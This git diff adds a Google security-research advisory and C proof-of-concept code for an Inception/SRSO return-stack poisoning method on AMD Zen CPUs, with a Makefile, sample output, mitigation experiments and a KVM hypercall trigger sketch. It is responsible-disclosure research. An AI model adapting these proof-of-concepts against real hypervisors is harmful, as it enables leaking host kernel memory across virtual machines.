diff --git a/pocs/cpus/inception/Makefile b/pocs/cpus/inception/Makefile
new file mode 100644
index 00000000..9921ce3f
--- /dev/null
+++ b/pocs/cpus/inception/Makefile
@@ -0,0 +1,7 @@
+all: clean poc
+
+poc:
+	$(CC) $(CFLAGS) -static -O0 poc.c -o poc
+
+clean:
+	rm -f poc
diff --git a/pocs/cpus/inception/README.md b/pocs/cpus/inception/README.md
new file mode 100644
index 00000000..9d10c5a7
--- /dev/null
+++ b/pocs/cpus/inception/README.md
@@ -0,0 +1,197 @@
+# Novel Inception/SRSO exploitation method
+
+TL;DR: We could exploit SRSO in KVM on AMD Zen 3 and Zen 4 by controlling the
+full return address stack (RAS). We did so by injecting a PhantomJMP (which
+subsequently injects a PhantomCALL) into the pipeline after a dispatch
+serializing instruction.
+
+### Context
+
+The Inception paper reports that on Zen 3 they could only poison one RAS entry
+and required a deep call stack to discard the corrected entries. On Zen 4, they
+report that they could poison multiple entries, but they still needed a deep
+call stack to discard the corrected ones. As a result, they could only exploit
+SRSO on Zen 4, and they reported that they didn't find a suitable code pattern
+to exploit it on Zen 3.
+
+> "Specifically, on Zen 3 microarchitectures we hijack a single return
+> instruction by first exhausting 17 uncorrupted RSB entries. On Zen 4, we need
+> to exhaust 8 uncorrupted RSB entries, after which we control the next 16
+> return target predictions."[^1]
+
+### Problem
+
+We experimented with the findings in the Inception paper and observed that
+injecting the PhantomJMP after a dispatch serializing instruction such as
+`rdtscp`, `lfence`, `cpuid`, `wrmsr`, or `invlpga` preserves all RAS entries
+injected by the PhantomCALL, and all of them are used for predicting the
+following return instructions. See the code below.
+
+```
+cpuid
+instr
+instr
+..
+ret
+```
+
+If the PhantomJMP collides in the BTB with any of the instructions following
+`cpuid`, then the `ret` speculatively executes the gadget injected by the
+PhantomCALL. Moreover, all following `ret` instructions will continue
+mispredicting from the poisoned RAS entries. We attached a proof-of-concept
+implementation of this vulnerability which works on Zen 3 and Zen 4.
+
+We tested it on the following CPUs:
+
+- AMD EPYC 9B14 96-Core Processor ucode (0xa101144)
+
+- AMD EPYC 7B13 64-Core Processor ucode (0xa0011d1)
+
+### Proof-of-concept
+
+Consider the code above to be the vulnerable code pattern. We train the
+PhantomJMP to collide with the `ret` following `cpuid`. The PhantomJMP
+destination is the PhantomCALL location. We train the PhantomCALL to collide
+with the instruction preceding the gadget. We find that the requirements
+presented in the paper regarding the location and destination of the
+PhantomJMP (section 6.3) are not necessary for the exploit to work on either
+Zen 3 or Zen 4.
+
+poc.c allows you to pass the depth of the call stack on the command line.
+Before every return, we shift the flush+reload array by 0x1000 to measure
+precisely which return instructions in the call stack mispredicted from the
+RAS.
+
+### Results
+
+We show that on both Zen 3 and Zen 4 we can control the full RAS.
+
+```
+make
+./poc 32 # will report hits from entry 0 to 32.
+```
+
+To test without the dispatch serializing instruction:
+
+```
+make CFLAGS="-DNO_DSI=1"
+./poc 32 # will report only a few entries
+```
+
+In our experiments, we added an RSB clearing sequence to see if that would
+remove the signal.
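+
+For reference, the sketch below is a minimal standalone version of the
+call-based stuffing loop that poc.c emits under `-DMITIGATION`. The wrapper
+function name and the `RSB_CLEAR_DEPTH` constant are ours for illustration;
+poc.c inlines the same sequence and calls the depth `RSB_DEPTH`:
+
+```
+#define STR(x) #x
+#define XSTR(x) STR(x)
+#define RSB_CLEAR_DEPTH 32 /* illustrative; poc.c uses RSB_DEPTH */
+
+static inline void rsb_clear(void) {
+  asm volatile(
+      // Each call pushes a benign return target onto the RAS/RSB. The int3 is
+      // never reached architecturally; it only traps speculation if a later
+      // ret mispredicts into the stuffed slot.
+      ".rept " XSTR(RSB_CLEAR_DEPTH) "\n\t"
+      "call 1f\n\t"
+      "int3\n\t"
+      "1:\n\t"
+      ".endr\n\t"
+      // Rebalance the stack pointer after the calls.
+      "add $(8 * " XSTR(RSB_CLEAR_DEPTH) "), %%rsp\n\t"
+      ::: "memory", "cc");
+}
+```
+
+With the PoC, the mitigation experiment is enabled as follows: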
+
+```
+make CFLAGS="-DMITIGATION -DRSB_DEPTH=8"
+./poc 32 # will report hits from entry 0 and 8-32
+```
+
+To clear the signal, run the following:
+
+```
+make CFLAGS="-DMITIGATION -DRSB_DEPTH=32"
+./poc 32 # will report hits on entry #0
+```
+
+We didn't clear the signal for the first return in the `a()` execution, so a
+hit for entry #0 will always show up.
+
+### Root cause hypothesis
+
+As a result of our analysis, we hypothesize that this vulnerability is possible
+because of the special microarchitectural conditions created by the
+architectural execution of dispatch serializing instructions. We think that
+such an instruction brings the RAS into a "clean" state which doesn't trigger
+the invalidation of RAS entries injected as a result of PhantomCALL
+speculation.
+
+### Mitigation
+
+We didn't research what impact this finding has on safeRET. Given that this
+vulnerability happens in microarchitectural conditions created by dispatch
+serializing instructions, and that such instructions are microcoded, we think
+AMD might be able to issue a microcode fix. We confirmed that IBPB mitigates
+this issue on Zen 3 and Zen 4.
+
+#### New mitigation discussion
+
+We investigated a potential mitigation for this particular vulnerability,
+namely clearing the RSB before the first return instruction that comes after a
+dispatch serializing instruction. We used the upstream Linux RSB clearing
+sequence in our experiments. We observed that the PhantomJMP can be trained to
+overlap with one of the RSB clearing sequence instructions or with the `ret`,
+so the signal was still present for specific RSB entries. With a 32-entry RSB
+clearing sequence, we couldn't observe signal for the first `ret` instructions
+in the deep call stack, but we still saw signal from roughly the 20th `ret`
+execution onwards, depending on the depth of the call stack.
+
+We conclude, based on our experiments, that clearing the RSB before the first
+return instruction that executes after a dispatch serializing instruction
+reduces the risk of this vulnerability by making it harder to control the full
+RSB.
+
+### Impact
+
+Vulnerable function | Serializing instruction
+------------------- | -----------------------
+[kvm_set_user_return_msr](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_set_user_return_msr) | wrmsr
+[kvm_set_msr_common](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_set_msr_common) | wrmsr
+[vcpu_enter_guest](https://elixir.bootlin.com/linux/v6.10.3/C/ident/vcpu_enter_guest) | wrmsr
+[svm_complete_interrupt_delivery](https://elixir.bootlin.com/linux/v6.10.3/C/ident/svm_complete_interrupt_delivery) | wrmsr
+[kvm_emulate_wbinvd](https://elixir.bootlin.com/linux/v6.10.3/C/ident/kvm_emulate_wbinvd) | wbinvd
+[svm_flush_tlb_gva](https://elixir.bootlin.com/linux/v6.10.3/C/ident/svm_flush_tlb_gva) | invlpga
+[read_tsc](https://elixir.bootlin.com/linux/v6.10.3/C/ident/read_tsc) | rdtscp
+
+We found 7 code patterns (see above) in the upstream Linux KVM implementation
+which are potentially exploitable. We have a full exploit for `read_tsc`, which
+we trigger using `vmmcall` with `rax = KVM_HC_CLOCK_PAIRING`. This was the
+easiest to exploit because the guest controls up to three (3) arguments. The
+exploit works on AMD Zen 3, and we believe it needs only a few small
+adjustments to also work on AMD Zen 4. We achieved an arbitrary memory read
+primitive in the host kernel.
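+
+For illustration, the guest-side trigger is just the hypercall itself. Below is
+a hedged sketch of how a guest can issue it; the helper name is ours, and the
+constant value (9) for `KVM_HC_CLOCK_PAIRING`, the wallclock pairing type, and
+the argument registers follow the generic x86 KVM hypercall ABI rather than
+being copied from our exploit code:
+
+```
+#include <stdint.h>
+
+#define KVM_HC_CLOCK_PAIRING 9         /* include/uapi/linux/kvm_para.h */
+#define KVM_CLOCK_PAIRING_WALLCLOCK 0
+
+// Issue the hypercall via vmmcall (AMD). Per the KVM hypercall ABI, the
+// hypercall number goes in rax and the first two arguments in rbx and rcx.
+// `gpa` is the guest-physical address of a struct kvm_clock_pairing buffer.
+static inline long hc_clock_pairing(uint64_t gpa) {
+  long ret;
+  asm volatile("vmmcall"
+               : "=a"(ret)
+               : "a"((uint64_t)KVM_HC_CLOCK_PAIRING), "b"(gpa),
+                 "c"((uint64_t)KVM_CLOCK_PAIRING_WALLCLOCK)
+               : "memory");
+  return ret;
+}
+```
+
+Handling this hypercall on the host eventually executes `read_tsc` and its
+`rdtscp`, i.e. the pattern listed in the table above.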
+ +Given the above, we consider the risk assessment section of this recent +[AMD report](https://www.amd.com/content/dam/amd/en/documents/epyc-technical-docs/white-papers/amd-epyc-9004-wp-srso.pdf) +to be inaccurate. + +#### Speculative ROP + +We discovered a novel method to control the RAS that allows us to chain gadgets +to construct a disclosure primitive. This method is different from the "Dueling +recursive phantom calls" presented in the Inception paper (Section 7.4). + +To inject two gadgets in the RAS, we use two chained recursive PhantomCALLs. + +``` +gadget1 - 5: PhantomCALL (call gadget2 - 5) +gadget1: +``` + +``` +gadget2 - 5: PhantomCALL (call gadget1 - 5) +gadget2: +``` + +When `gadget1 - 5` is fetched, `gadget1` is pushed to RAS. Then the cpu starts +fetching at `gadget2 - 5`, according to the first PhantomCALL destination. That +pushes `gadget2` to RAS. Next, the cpu fetches at `gadget1 - 5` again and pushes +`gadget1` to RAS and so on. This results in `gadget1` and `gadget2` to be +interleaved in the RAS. + +With this method we could chain up to three (3) gadgets. In our KVM exploit, we +only need to chain two gadgets to achieve a reliable disclosure primitive. + +### Disclosure + +We are privately disclosing this vulnerability to you so that you can develop a +fix and manage its rollout. We do not require you to keep any information of +this report secret, but if you make it public then please let us know that you +did. This advisory will be kept private by Google for 30 days after a fix is +publicly available or after 90 days if no fix is made. After this deadline we +plan to disclose this advisory in full at: +http://github.com/google/security-research/. Please read more details about this +policy here: https://g.co/appsecurity + +Finder: Andy Nguyen of the Google Security Team + +Credits: Andy Nguyen, Anthony Weems, Matteo Rizzo, Alexandra Sandulescu + +[^1]: https://comsec.ethz.ch/wp-content/files/inception_sec23.pdf diff --git a/pocs/cpus/inception/out.txt b/pocs/cpus/inception/out.txt new file mode 100644 index 00000000..eb8a06b5 --- /dev/null +++ b/pocs/cpus/inception/out.txt @@ -0,0 +1,198 @@ +inception +==== round 0 ===== +==== round 1 ===== +hit for 1 +hit for 2 +hit for 11 +hit for 12 +==== round 2 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 3 ===== +hit for 0 +hit for 1 +hit for 4 +hit for 5 +hit for 21 +==== round 4 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 5 ===== +hit for 0 +hit for 1 +hit for 17 +hit for 18 +==== round 6 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 
+hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 7 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 8 ===== +hit for 0 +hit for 1 +hit for 2 +hit for 3 +hit for 4 +hit for 5 +hit for 6 +hit for 7 +hit for 8 +hit for 9 +hit for 10 +hit for 11 +hit for 12 +hit for 13 +hit for 14 +hit for 15 +hit for 16 +hit for 17 +hit for 18 +hit for 19 +hit for 20 +hit for 21 +hit for 22 +hit for 23 +hit for 24 +hit for 25 +hit for 26 +hit for 27 +hit for 28 +hit for 29 +hit for 30 +hit for 31 +hit for 32 +hit for 33 +hit for 34 +==== round 9 ===== +hit for 0 diff --git a/pocs/cpus/inception/poc.c b/pocs/cpus/inception/poc.c new file mode 100644 index 00000000..3b8fa12d --- /dev/null +++ b/pocs/cpus/inception/poc.c @@ -0,0 +1,320 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PWN_PATTERN 0x100100000000 +#define ADDRESS_A 0x20000000 +#define ADDRESS_B (ADDRESS_A ^ PWN_PATTERN) +#define CACHE_THRESHOLD 120 +#define ITERATIONS 10 + +// Hopefully tricks the prefetcher to avoid false positives. +#define PREFETCH_OFFSET 0x800 + +static int should_segfault = 0; + +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +// Load a byte from memory and time how long it takes +static uint64_t time_load(const void *addr) { + uint64_t ret; + + asm volatile( + // rdtscp waits for earlier instructions to retire before reading the + // TSC. + "rdtscp\n" + // timestamp in r8d:ebx + "mov %%eax, %%ebx\n" + "mov %%edx, %%r8d\n" + "lfence\n" + + // Do the memory access. + "movb (%%rdi), %%cl\n" + + // On AMD/Linux lfence always waits for all previous instructions to + // retire before executing the next instruction. 
+ "rdtscp\n" + // timestamp in edx:eax + "lfence\n" + + "shlq $32, %%r8\n" + // timestamp in rbx + "orq %%r8, %%rbx\n" + "shlq $32, %%rdx\n" + // timestamp in rax + "orq %%rdx, %%rax\n" + "subq %%rbx, %%rax\n" + : "=a"(ret) + : "D"(addr) + : "rbx", "rcx", "rdx", "r8"); + + return ret; +} + +static __attribute__((naked, noinline)) void train_arch( + uint64_t target, uint64_t training_code) { + asm volatile( + "mov %0, %%r8\n\t" + // Used to recover from crash + "leaq 1f(%%rip), %%rcx\n\t" + + "jmp *%%rsi\n" + + "1:\n" + "pop %%rax\n\t" + "2:" + "retq\n" ::"r"(target), + "S"(training_code) + : "memory", "r8"); +} + +extern void *a_start, *a_load, *a_end; +extern void *b_start, *b_load, *b_end; + +#define STR(x) #x +#define XSTR(s) STR(s) +static __attribute__((naked, noinline, used)) void gadgets() { + asm("a_start:\n" +#ifndef NO_DSI + " push %rax\n" + " push %rbx\n" + " push %rcx\n" + " push %rdx\n" + " cpuid\n" + " pop %rdx\n" + " pop %rcx\n" + " pop %rbx\n" + " pop %rax\n" +#endif + // PhantomJMP + " nop\n" + " nop\n" + " ret\n" + ".skip 0x1000, 0x90\n" + "a_load:\n" + // PhantomCALL + " call a_some_func\n" + // Loads from rdi which points to a fr_array entry + " movq " XSTR(PREFETCH_OFFSET) "(%rdi), %rax\n" + " xor %rdi, %rdi\n" + " ret\n" + "a_some_func:\n" + " ret\n" + "a_end:\n"); + + asm("b_start:\n" +#ifndef NO_DSI + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" +#endif + " call *%r8\n" // training jmp + ".skip 0x1000, 0x90\n" + "b_load:\n" + " call *%r8\n" // training call + "b_end:\n"); +} + +#define lfsr_advance(lfsr) \ + { \ + uint8_t bit = (lfsr ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1; \ + lfsr = (lfsr >> 1) | (bit << 7); \ + } + +#define FR_COUNT 256 +#define FR_ARRAY_SIZE (2 * 1024 * 1024) +#define FR_STRIDE 0x1000 + +static void *fr_array; + +static __always_inline void inception_flush(void) { + for (int i = 0; i < FR_COUNT; i++) { + asm volatile("clflush (%0)" + : + : "r"(fr_array + i * FR_STRIDE + PREFETCH_OFFSET) + : "memory"); + } + + asm volatile("mfence" ::: "memory"); +} +static __always_inline void inception_flush_one(uint64_t ptr) { + asm volatile("clflush (%0); mfence" : : "r"(ptr) : "memory"); +} + +static __always_inline uint8_t inception_reload(int hits[]) { + asm volatile("mfence" ::: "memory"); + + // use lfsr because of aggressive prefetching + uint8_t lfsr = 123; + + uint64_t t = time_load(fr_array + PREFETCH_OFFSET); + inception_flush_one((uint64_t)fr_array + PREFETCH_OFFSET); + if (t < CACHE_THRESHOLD) hits[0] = 1; + + for (int i = 1; i < FR_COUNT; i++) { + lfsr_advance(lfsr); + uint64_t t = time_load(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET); + // flush immediately after + inception_flush_one( + (uint64_t)(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET)); + + if (t < CACHE_THRESHOLD) hits[lfsr] = 1; + } + + return 0; +} + +static void handle_segv(int sig, siginfo_t *si, void *ucontext) { + ucontext_t *ctx = ucontext; + + if (!should_segfault) { + printf("Unexpected segfault\n"); + exit(1); + } + + should_segfault = 0; + ctx->uc_mcontext.gregs[REG_RIP] = ctx->uc_mcontext.gregs[REG_RCX]; +} + +extern void deep_callstack_done(void); + +int main(int argc, char *argv[]) { + int depth = 20; + if (argc >= 2) { + depth = atoi(argv[1]); + + if (depth < 2) { + printf("invalid depth. 
Must be >= 2\n"); + exit(EXIT_FAILURE); + } + } + + struct sigaction sa; + sa.sa_flags = SA_SIGINFO; + sigemptyset(&sa.sa_mask); + sa.sa_sigaction = &handle_segv; + sigaction(SIGSEGV, &sa, NULL); + + printf("inception\n"); + + pin_cpu(1); + + fr_array = mmap((void *)0x10000000, 2 * 1024 * 1024, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memset(fr_array, 'A', 2 * 1024 * 1024); + + void *a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + void *b = (void *)mmap((void *)ADDRESS_B, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)b, &b_start, (uint64_t)&b_end - (uint64_t)&b_start); + + if ((uint64_t)&a_load - (uint64_t)&a_start != + (uint64_t)&b_load - (uint64_t)&b_start) { + printf("mismatch: %lx vs %lx\n", (uint64_t)&a_load - (uint64_t)&a_start, + (uint64_t)&b_load - (uint64_t)&b_start); + return 0; + } + + for (int j = 0; j < ITERATIONS; j++) { + munmap(a, 2 * 1024 * 1024); + + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE | PROT_EXEC); + + // Train + for (int i = 0; i < 2; i++) { + should_segfault = 1; + train_arch(ADDRESS_A + ((uint64_t)&a_load - (uint64_t)&a_start), + (ADDRESS_B + (uint64_t)&b_start - (uint64_t)&b_start)); + + should_segfault = 1; + train_arch(ADDRESS_A + ((uint64_t)&a_load - (uint64_t)&a_start), + (ADDRESS_B + (uint64_t)&b_load - (uint64_t)&b_start)); + } + + // mark b as NX + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE); + + a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + printf("==== round %d =====\n", j); + + // FLush + inception_flush(); + + // Trigger victim + // deep call stack + asm volatile( + "push %3; mfence\n\t" // last ret will exit + "z: cmp $2, %0; jle out; dec %0\n\t" + "call z\n\t" + // shift the fr_array ptr + "add $0x1000, %%rdi; ret\n\t" + + "out:\n\t" + "mov %1, %%rdi\n\t" + "call *%2\n\t" + +#ifdef MITIGATION +#ifndef RSB_DEPTH +#define RSB_DEPTH 32 +#endif + // RSB clearing + ".rept " XSTR(RSB_DEPTH) "\n" + "call 1f\n" + "int3\n" + "1:\n" + ".endr\n" + "add $(8 * " XSTR(RSB_DEPTH) "), %%rsp\n" +#endif + // shift the fr_array ptr + "add $0x1000, %%rdi\n\t" + "ret\n\t" + "deep_callstack_done:" + : + : "r"(depth), "r"(fr_array), "r"(a), "r"(deep_callstack_done) + : "rdi", "memory", "rcx"); + + // Reload + int hits[256] = {}; + inception_reload(hits); + + for (int i = 0; i < 256; i++) + if (hits[i]) printf("hit for %d\n", i); + + fflush(stdout); + } + + return 0; +} diff --git a/pocs/cpus/inception/poc3.c b/pocs/cpus/inception/poc3.c new file mode 100644 index 00000000..89a0808c --- /dev/null +++ b/pocs/cpus/inception/poc3.c @@ -0,0 +1,344 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PWN_PATTERN 0x000080080000 +#define ADDRESS_A 0x20000000 +#define ADDRESS_B (ADDRESS_A ^ PWN_PATTERN) +#define CACHE_THRESHOLD 120 +#define ITERATIONS 10 + +// Hopefully tricks the prefetcher to avoid false positives. 
+#define PREFETCH_OFFSET 0x800 + +static int should_segfault = 0; + +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +// Load a byte from memory and time how long it takes +static uint64_t time_load(const void *addr) { + uint64_t ret; + + asm volatile( + // rdtscp waits for earlier instructions to retire before reading the + // TSC. + "rdtscp\n" + // timestamp in r8d:ebx + "mov %%eax, %%ebx\n" + "mov %%edx, %%r8d\n" + "lfence\n" + + // Do the memory access. + "movb (%%rdi), %%cl\n" + + // On AMD/Linux lfence always waits for all previous instructions to + // retire before executing the next instruction. + "rdtscp\n" + // timestamp in edx:eax + "lfence\n" + + "shlq $32, %%r8\n" + // timestamp in rbx + "orq %%r8, %%rbx\n" + "shlq $32, %%rdx\n" + // timestamp in rax + "orq %%rdx, %%rax\n" + "subq %%rbx, %%rax\n" + : "=a"(ret) + : "D"(addr) + : "rbx", "rcx", "rdx", "r8"); + + return ret; +} + +static __attribute__((naked, noinline)) void train_arch( + uint64_t target, uint64_t training_code) { + asm volatile( + "mov %0, %%r8\n\t" + // Used to recover from crash + "leaq 1f(%%rip), %%rcx\n\t" + + "jmp *%%rsi\n" + + "1:\n" + "pop %%rax\n\t" + "2:" + "retq\n" ::"r"(target), + "S"(training_code) + : "memory", "r8"); +} + +static __attribute__((naked, noinline)) void train_ret(uint64_t target, + uint64_t training_code) { + asm volatile( + "mov %0, %%r8\n\t" + + // Flush the stack to widen the speculation window. + "clflush -8(%%rsp)\n" + "mfence\n" + + "call 1f\n" + // Executed only speculatively + "jmp *%%rsi\n" + "lfence\n" + + "1:\n" + // For some reason, compiler emits a different instruction that crashes, + // so hardcode bytes here. + // add 0x8, %%rsp + ".byte 0x48, 0x83, 0xc4, 0x08\n" + "retq\n" ::"r"(target) + : "memory"); +} + +extern void *a_start, *a_load, *a_end; +extern void *b_start, *b_load, *b_end; + +#define STR(x) #x +#define XSTR(s) STR(s) +static __attribute__((naked, noinline, used)) void gadgets() { + asm("a_start:\n" +#ifndef NO_DSI + " push %rax\n" + " push %rbx\n" + " push %rcx\n" + " push %rdx\n" + " cpuid\n" + " pop %rdx\n" + " pop %rcx\n" + " pop %rbx\n" + " pop %rax\n" +#endif + // PhantomJMP + " nop\n" + " nop\n" + " ret\n" + ".skip 0x1000, 0x90\n" + "a_load:\n" + // PhantomCALL + " call a_some_func\n" + // Loads from rdi which points to a fr_array entry + " movq " XSTR(PREFETCH_OFFSET) "(%rdi), %rax\n" + " xor %rdi, %rdi\n" + " ret\n" + "a_some_func:\n" + " ret\n" + "a_end:\n"); + + asm("b_start:\n" +#ifndef NO_DSI + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" + " nop\n" +#endif + " call *%r8\n" // training jmp + ".skip 0x1000, 0x90\n" + "b_load:\n" + " call *%r8\n" // training call + "b_end:\n"); +} + +#define lfsr_advance(lfsr) \ + { \ + uint8_t bit = (lfsr ^ (lfsr >> 2) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1; \ + lfsr = (lfsr >> 1) | (bit << 7); \ + } + +#define FR_COUNT 256 +#define FR_ARRAY_SIZE (2 * 1024 * 1024) +#define FR_STRIDE 0x1000 + +static void *fr_array; + +static __always_inline void inception_flush(void) { + for (int i = 0; i < FR_COUNT; i++) { + asm volatile("clflush (%0)" + : + : "r"(fr_array + i * FR_STRIDE + PREFETCH_OFFSET) + : "memory"); + } + + asm volatile("mfence" ::: "memory"); +} +static __always_inline void inception_flush_one(uint64_t ptr) { + asm volatile("clflush (%0); mfence" : : "r"(ptr) : "memory"); +} + +static __always_inline uint8_t inception_reload(int hits[]) { + asm volatile("mfence" ::: 
"memory"); + + // use lfsr because of aggressive prefetching + uint8_t lfsr = 123; + + uint64_t t = time_load(fr_array + PREFETCH_OFFSET); + inception_flush_one((uint64_t)fr_array + PREFETCH_OFFSET); + if (t < CACHE_THRESHOLD) hits[0] = 1; + + for (int i = 1; i < FR_COUNT; i++) { + lfsr_advance(lfsr); + uint64_t t = time_load(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET); + // flush immediately after + inception_flush_one( + (uint64_t)(fr_array + lfsr * FR_STRIDE + PREFETCH_OFFSET)); + + if (t < CACHE_THRESHOLD) hits[lfsr] = 1; + } + + return 0; +} + +static void handle_segv(int sig, siginfo_t *si, void *ucontext) { + ucontext_t *ctx = ucontext; + + if (!should_segfault) { + printf("Unexpected segfault\n"); + exit(1); + } + + should_segfault = 0; + ctx->uc_mcontext.gregs[REG_RIP] = ctx->uc_mcontext.gregs[REG_RCX]; +} + +extern void deep_callstack_done(void); + +int main(int argc, char *argv[]) { + int depth = 20; + if (argc >= 2) { + depth = atoi(argv[1]); + + if (depth < 2) { + printf("invalid depth. Must be >= 2\n"); + exit(EXIT_FAILURE); + } + } + + struct sigaction sa; + sa.sa_flags = SA_SIGINFO; + sigemptyset(&sa.sa_mask); + sa.sa_sigaction = &handle_segv; + sigaction(SIGSEGV, &sa, NULL); + + printf("inception\n"); + + pin_cpu(1); + + fr_array = mmap((void *)0x10000000, 2 * 1024 * 1024, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memset(fr_array, 'A', 2 * 1024 * 1024); + + void *a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + void *b = (void *)mmap((void *)ADDRESS_B, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)b, &b_start, (uint64_t)&b_end - (uint64_t)&b_start); + + if ((uint64_t)&a_load - (uint64_t)&a_start != + (uint64_t)&b_load - (uint64_t)&b_start) { + printf("mismatch: %lx vs %lx\n", (uint64_t)&a_load - (uint64_t)&a_start, + (uint64_t)&b_load - (uint64_t)&b_start); + return 0; + } + + for (int j = 0; j < ITERATIONS; j++) { + munmap(a, 2 * 1024 * 1024); + + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE | PROT_EXEC); + + // Train + for (int i = 0; i < 2; i++) { + // should_segfault = 1; + train_ret(ADDRESS_B + ((uint64_t)&b_load - (uint64_t)&b_start), + (ADDRESS_B + (uint64_t)&b_start - (uint64_t)&b_start)); + + // should_segfault = 1; + train_ret(ADDRESS_B + ((uint64_t)&b_load - (uint64_t)&b_start), + (ADDRESS_B + (uint64_t)&b_load - (uint64_t)&b_start)); + } + + // mark b as NX + mprotect(b, 2 * 1024 * 1024, PROT_READ | PROT_WRITE); + + a = (void *)mmap((void *)ADDRESS_A, 2 * 1024 * 1024, + PROT_READ | PROT_WRITE | PROT_EXEC, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + memcpy((void *)a, &a_start, (uint64_t)&a_end - (uint64_t)&a_start); + + sched_yield(); + + // FLush + inception_flush(); + + // Trigger victim + // deep call stack + asm volatile( + "push %3; mfence\n\t" // last ret will exit + "z: cmp $2, %0; jle out; dec %0\n\t" + "call z\n\t" + // shift the fr_array ptr + "add $0x1000, %%rdi; ret\n\t" + + "out:\n\t" + "mov %1, %%rdi\n\t" + "call *%2\n\t" + +#ifdef MITIGATION +#ifndef RSB_DEPTH +#define RSB_DEPTH 32 +#endif + // RSB clearing + ".rept " XSTR(RSB_DEPTH) "\n" + "call 1f\n" + "int3\n" + "1:\n" + ".endr\n" + "add $(8 * " XSTR(RSB_DEPTH) "), %%rsp\n" +#endif + // shift the fr_array ptr + "add $0x1000, %%rdi\n\t" + "ret\n\t" + "deep_callstack_done:" + : + : "r"(depth), 
"r"(fr_array), "r"(a), "r"(deep_callstack_done) + : "rdi", "memory", "rcx"); + + // Reload + int hits[256] = {}; + inception_reload(hits); + + printf("==== round %d =====\n", j); + for (int i = 0; i < 256; i++) + if (hits[i]) printf("hit for %d\n", i); + + fflush(stdout); + } + + return 0; +}